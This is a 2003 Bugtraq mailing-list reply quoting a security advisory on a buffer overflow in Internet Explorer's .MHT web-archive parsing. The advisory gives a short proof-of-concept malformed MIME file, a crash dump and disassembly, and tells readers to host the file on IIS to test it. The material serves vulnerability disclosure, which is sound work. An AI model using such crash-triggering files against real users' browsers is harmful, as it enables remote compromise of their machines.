I believe from ie6 SP1 on IE doesn't open any mht files directly from the web anymore. from the local filesystem it still works though. ----- Original Message ----- From: "Tom Tanaka" <tomatell@canon-sol.jp> To: <bugtraq@securityfocus.com> Sent: Monday, March 10, 2003 5:30 AM Subject: .MHT Buffer Overflow in Internet Explorer > > > CANON SYSTEM SOLUTIONS INC. Security Alert > > VULNERABILITY:.MHT Buffer Overflow in Internet Explorer > > DATE FOUND:March 2, 2003 > > Severity:High Risk(code can be executed remotely) > ========================================================================== > ==== > SUMMARY: > > IE5 introduced the new 'Web Archive' format for storing web pages, which > have the extension MHT. The 'Web Archive' saves a web page as a single > document complete with all images. The format is a standard > mime/multipart e-mail message, a mime decoding program such as 7bit, 8bit > and Base 64 decoder should be able to turn it into something usable with > your OS and browser of choice. > > This format is pretty nifty and usable, however, there is a potential > security breach found when used with encoded executable along with > malformed MIME header in the 'Web Archive'. If the encode data is > executable or has a single word "MZP" encoded within and Content-Type is > not designated, IE5 will be terminated by critical buffer > overflow.Consequently, one could compromise the client pc by executing > malicious code in the memory. > ========================================================================== > ==== > AFFECTED SYSTEM: > > Microsoft Internet Explorer 5.5 and 6.0; prior versions are not > vulnerable. > ========================================================================== > ==== > ANALYSIS: > > RFC822 describes the structure of message header used for the MIME. The > followings are some of the identifiers defined for the MIME header. > >  MIME-Version: >  Content-Type: >  Content-Trasfer-Encoding: >  Content-ID: >  Content-Description: > > The 'Content-Type' is used for defining the types of media transfered. > The 'Web Archive' format utilizes the Multipart/Related content-type > (defined in RFC2387) to properly embed the multiple web content files. As > described in RFC2387, the Multipart/Related content-type provides a > common mechanism for representing objects that are aggregates of related > MIME body parts. When tranferring html or plain text data encoded in > the 'Web Archive', IE5 interprets as a plain text with 'carriage return' > code(0D0A) , otherwise as binary data without 'carriage return' code > (0D0A). By manipulating the MIME header structure and the Base64 encoded > data as an executable,4 bytes of memory can be overwritten. > > > PROOF OF CONCEPT: > > The following format is usually used for the Web Archive. > ---------------------------------------------- > From: <Saved from Microsoft Internet Explorer 5> > Subject: =?iso-2022-jp?B? > GyRCJT0lVSVIJSYlJyUiJVclbSVAJS8lSBsoQiBIb21lUGFnZQ==?= > Date: Tue, 4 Mar 2003 02:16:23 +0900 > MIME-Version: 1.0 > Content-Type: multipart/related; > boundary="----=_NextPart_000_0000_01C2E1F4.0D559EA0"; > type="text/html" > X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106 > > This is a multi-part message in MIME format. > > ------=_NextPart_000_0000_01C2E1F4.0D559EA0 > Content-Location:file:///tomatell.exe > Content-Transfer-Encoding: base64 > > TVpQ > ---------------------------------------------- > > > The following sample format contains malformed MIME header along with the > Base64 encoded executable. > ---------------------------------------------- > MIME-Version: 1.0 > ------=_NextPart_000_0000_01C2E1F4.0D559EA0 > Content-Location:file:///tomatell.exe > Content-Transfer-Encoding: base64 > > TVpQ > ---------------------------------------------- > > Note that the encoded string, "TVpQ", is the Win32 EXE signature located > at the first three bytes of the EXE header. This is for the Win32 system > to identify the data as a Win32 executable file. IE5 somehow reads this > signature and interprets the data as an executable whereas the MIME > encoder/decoder module,'inetcomm.dll', decodes as a plain 7 or 8 bit text > data. Thus, IE5 creates a stream with a smaller buffersize than that of > Base64 decoder has. > > > The following error will occur when the above file is browsed by IE5. > > Unhandled exception in iexplore.exe: 0xC0000005: Access Violation. > > > > By debugging through the crash dump, the exception error is generated at > the EIP(32-bit Instruction Pointer)=74CF497E called from inetcomm.dll to > Kernel32. > > Register > EAX = 00000000 EBX = 05AD3A20 ECX = 001FE074 EDX = 001FE190 > ESI = 05AD39D8 EDI = 00000000 [EIP = 74CF497E] ESP = 0607B2BC > EBP = 0607B2FC EFL = 00000246 > > > \KernelObjects\CritSecOutOfMemoryEvent > > 74cf494c ff157412cd74 call dword ptr > [KERNEL32.EnterCriticalSection] > 74cf4952 834e3c02 or dword ptr [esi+3c],+02 > 74cf4956 33ff xor edi,edi > 74cf4958 397e1c cmp dword ptr [esi+1c],edi > 74cf495b 743f jz 74cf499c > 74cf495d 397c2410 cmp dword ptr [esp+10],edi > 74cf4961 8bce mov ecx,esi > 74cf4963 7d06 jnl 74cf496b > 74cf4965 ff742410 push dword ptr [esp+10] > 74cf4969 eb25 jmp short 74cf4990 > > 74cf496b c746441f000000 mov dword ptr [esi+44],0000001f > 74cf4972 e888f3ffff call 74cf3cff > 74cf4977 3bc7 cmp eax,edi > 74cf4979 7c12 jl 74cf498d > 74cf497b 8b461c mov eax,dword ptr [esi+1c] > 74cf497e 8b08 mov ecx,dword ptr [eax] //Exception > > > You could test the vulnerablity by copying above exploit to a file with > an extention ".mht" and place it at the default root directory of IIS web > server and set it as a default html of the server. > > WORKAROUND: > Currently none available. > > Credit: > Tom Tanaka > > /_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/ > Tom Tanaka <tomatell@canon-sol.co.jp> > Technical Manager, Security > Software Products Department > Tokyo Office > CANON SYSTEM SOLUTIONS INC.. > 1-2-18 Ikenohata Taito-ku, Tokyo 110-0008, Japan > Ph.: +81-3-5815-7243 > Fax : +81-3-5815-7262 > /_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/ > > >
